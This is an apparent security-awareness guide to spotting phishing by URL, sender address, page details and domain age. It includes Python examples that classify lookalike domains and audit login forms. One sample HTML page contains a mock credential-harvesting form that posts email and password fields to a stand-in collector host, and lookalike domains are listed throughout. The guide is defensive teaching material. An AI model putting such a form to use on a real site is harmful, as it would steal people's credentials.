Most phishing attempts fail this 3-second test. The ones that pass deserve closer scrutiny.

URLs are the hardest thing for attackers to fake. Learn to read them.

https://account.paypal.com/login breaks down as:

  • https:// - Protocol (should be HTTPS for any login)
  • account.paypal.com - Domain (this is what matters)
  • /login - Path (less important for legitimacy)

The domain is everything between :// and the next /. Within that domain, read right to left:

  • paypal.com - This is the actual domain (owned by PayPal)
  • account. - This is a subdomain (controlled by whoever owns paypal.com)

Attackers use several tricks:

Subdomain deception:

  • paypal.account-verify.com - The domain is account-verify.com, not PayPal
  • secure-paypal.com.malicious.net - The domain is malicious.net

Typosquatting:

  • paypai.com (lowercase i instead of lowercase l)
  • paypa1.com (number 1 instead of lowercase l)
  • paypal-secure.com (adding words to legitimate brand)

Homograph attacks:

  • Using characters from different alphabets that look identical
  • pаypal.com using Cyrillic ‘а’ instead of Latin ‘a’

On desktop, hover over links to see their destination before clicking. On mobile, long-press links to preview URLs.

If the displayed text says “www.paypal.com” but the link goes elsewhere, that’s phishing.

Email display names can be anything. The actual address matters.

Legitimate:

  • service@paypal.com
  • noreply@email.chase.com

Suspicious:

  • paypal-service@gmail.com
  • support@paypal.security-verify.com
  • alert@paypal.com.suspicious-domain.net
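The "read the domain right to left" rule above and the sender-address checks just listed are the same test: find the registrable domain and ask whether it is the brand you expect. The following is an added example, not code from this article, that applies that test to both URLs and email addresses; the public-suffix set, the "paypal.com" default, and the label names are assumptions of the example.

```python
from urllib.parse import urlsplit
import unicodedata

# Constructed stand-in for the public suffix list; a real check should use the
# full list (e.g. the tldextract package) so that suffixes like "co.uk" resolve.
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk"}


def registrable_domain(host: str) -> str:
    """The part that matters: the label directly left of the public suffix."""
    labels = host.lower().rstrip(".").split(".")
    for n in (2, 1):  # try two-label suffixes (co.uk) before one-label (com)
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-n - 1:])
    return host.lower()


def split_input(value: str) -> tuple:
    """Return (mailbox local part, host) for an email, or ("", host) for a URL."""
    if "@" in value and "://" not in value:
        local, host = value.rsplit("@", 1)
        return local.lower(), host.lower()
    url = value if "://" in value else "http://" + value
    return "", (urlsplit(url).hostname or "")


def one_edit_away(a: str, b: str) -> bool:
    """True if a and b differ by a single substitution, insertion or deletion."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) == len(b):
        return sum(x != y for x, y in zip(a, b)) == 1
    short, long_ = sorted((a, b), key=len)
    return any(long_[:i] + long_[i + 1:] == short for i in range(len(long_)))


def classify(value: str, expected: str = "paypal.com") -> str:
    """Label a URL or sender address against the brand domain we expect."""
    local, host = split_input(value)
    if not host.isascii():  # mixed-script host: the homograph case above
        odd = [unicodedata.name(c, "?") for c in host if not c.isascii()]
        return f"homograph: non-ASCII characters {odd}"
    domain = registrable_domain(host)
    if domain == expected:
        return f"ok: {domain}"
    brand = expected.split(".")[0]
    subdomains = host[: -len(domain)] if host.endswith(domain) else ""
    if brand in subdomains:  # brand used as a subdomain of someone else's domain
        return f"subdomain-deception: real domain is {domain}"
    label = domain.split(".")[0]
    if brand in label or one_edit_away(label, brand):  # paypa1, paypai, paypal-secure
        return f"typosquat: {domain}"
    if brand in local:  # paypal-service@gmail.com: brand only in the mailbox name
        return f"brand-in-mailbox: real domain is {domain}"
    return f"unrelated: {domain}"
```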

Urgency without specificity:

  • “Your account will be suspended in 24 hours” - What account? Why?
  • Legitimate services provide specific details about issues

Generic greetings:

  • “Dear Customer” or “Dear User” when legitimate emails would use your name

Grammar and formatting:

  • Legitimate companies have professional copywriters and QA processes
  • Errors suggest rushed, non-professional origin

Mismatched branding:

  • Wrong logo colors, fonts, or layouts
  • Images that look stretched or pixelated
  • Footer information that doesn’t match the claimed sender

Be especially cautious of:

  • Unexpected attachments from anyone
  • File types that can execute code (.exe, .js, .html, .zip with executables)
  • “Invoice” or “Document” attachments you didn’t expect
  • Password-protected files (attackers use this to bypass security scanners)

When you reach a website (whether through email link or direct navigation), verify legitimacy before entering credentials.

HTTPS with a valid certificate is necessary but not sufficient. Attackers get SSL certificates too.

What to check:

  • Click the padlock icon → View certificate details
  • Verify the certificate is issued to the expected organization
  • Check the certificate isn’t expired

What certificates DON’T tell you:

  • That the site is legitimate
  • That your data is safe
  • That you should trust the organization

A phishing site can have a perfectly valid SSL certificate.

Compare against your memory of the legitimate site:

  • Are colors exactly right?
  • Is the logo correct?
  • Is the layout what you expect?
  • Do fonts look professional?

When in doubt, navigate directly to the site by typing the URL or using a bookmark. Don’t trust links.

Phishing sites often only implement the pages needed for credential theft.

Signs of a fake:

  • Footer links that go nowhere or to unrelated pages
  • “Forgot password” or “Create account” links that don’t work
  • Missing functionality that the real site would have
  • Error messages that don’t make sense

Check when a domain was registered:

  • Legitimate company domains are typically years old
  • Phishing domains are often registered days or weeks before attacks

Use the whois command or online tools to check domain age.

Search certificate transparency logs for the domain to see:

  • When certificates were issued
  • How many certificates exist for the domain
  • Whether the certificate history matches expectations

For technical users:

  • Inspect network requests to see where data is actually sent
  • Check for suspicious JavaScript
  • Look at form action URLs
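Two of the checks above, "footer links that go nowhere" and "look at form action URLs", can be done mechanically over a page's HTML. This is an added example, not code from this article: it parses a constructed login page, reports every form that submits to a host other than the page's own, and counts placeholder links. The sample URL and HTML are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# href values that render as links but lead nowhere.
DEAD_HREFS = {"", "#", "javascript:void(0)", "javascript:;"}


class PageAudit(HTMLParser):
    """Collect where each form submits and which links are placeholders."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.form_targets = []   # (resolved action URL, [input names])
        self.dead_links = []     # href values that lead nowhere
        self._current = None     # form being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing action posts back to the page itself; resolve relatives.
            action = urljoin(self.page_url, a.get("action") or "")
            self._current = (action, [])
            self.form_targets.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current[1].append(a.get("name") or a.get("type") or "?")
        elif tag == "a":
            href = (a.get("href") or "").strip()
            if href.lower() in DEAD_HREFS:
                self.dead_links.append(href)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit(page_url: str, html: str) -> dict:
    """Flag forms whose data goes to a different host than the page itself."""
    parser = PageAudit(page_url)
    parser.feed(html)
    page_host = urlsplit(page_url).hostname
    offsite = [(act, names) for act, names in parser.form_targets
               if urlsplit(act).hostname != page_host]
    return {"forms": len(parser.form_targets), "offsite_forms": offsite,
            "dead_links": len(parser.dead_links)}


# Constructed sample: a login page whose form sends credentials to another
# host and whose footer links are placeholders (hypothetical domains).
SAMPLE_URL = "https://secure-login.example.net/signin"
SAMPLE_HTML = """<html><body>
<form method="post" action="https://collector.example.org/grab.php">
  <input name="email" type="text"><input name="password" type="password">
  <input type="submit" value="Log In">
</form>
<footer><a href="#">Privacy</a> <a href="javascript:void(0)">Help</a>
<a href="/contact">Contact</a></footer>
</body></html>"""

if __name__ == "__main__":
    print(audit(SAMPLE_URL, SAMPLE_HTML))
```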

  1. Don’t click anything in the suspicious message
  2. Report it - Forward to your IT security team or use the report phishing button
  3. Delete it - Remove from inbox to avoid accidental future clicks

If You Clicked But Didn’t Enter Information

  1. Close the tab immediately
  2. Clear your browser cache
  3. Run a malware scan
  4. Monitor for unusual activity

  1. Change password immediately on the legitimate site
  2. Enable 2FA if not already active
  3. Check for unauthorized activity in the affected account
  4. Report the incident to IT security
  5. Monitor related accounts - if you reuse passwords, change those too

Make verification automatic, not exceptional:

  • Always check sender addresses
  • Always hover over links before clicking
  • Always navigate directly for sensitive actions

Assume unexpected requests are suspicious until verified:

  • Banks don’t email asking for credentials
  • Tech support doesn’t call unsolicited
  • Legitimate urgency comes with verifiable specifics

If a request might be legitimate:

  • Call the company using a number from their official website (not from the email)
  • Navigate directly to the service and check your account
  • Contact the purported sender through a known-good method

For organizations building phishing detection capabilities:

Regular simulated phishing campaigns:

  • Establish baseline click rates
  • Provide immediate education when employees click
  • Track improvement over time
  • Adjust difficulty as skills improve

Make reporting easy:

  • One-click phishing report buttons in email clients
  • No penalties for reporting false positives
  • Feedback on reported items to reinforce good behavior

Ongoing touchpoints:

  • Brief reminders about current phishing trends
  • Examples of real attacks targeting your industry
  • Recognition for employees who catch and report attempts

Here’s what I’ve learned watching thousands of people go through phishing simulations: the ones who catch attacks aren’t the most security-aware. They’re the ones who’ve built checking into their workflow.

They hover over every link. Not because they’re suspicious of that specific email, but because that’s just what they do. They verify sender addresses the way they check their mirrors before changing lanes. Automatic.

The goal isn’t to become paranoid. It’s to make verification so routine that you don’t have to think about it.

Most phishing attempts are obvious once you look. The trick is remembering to look when you’re tired, rushed, or just trying to get through your inbox before lunch.


Build detection habits through practice, not just training. Try our interactive security exercises with phishing scenarios designed to test your reflexes, not just your knowledge.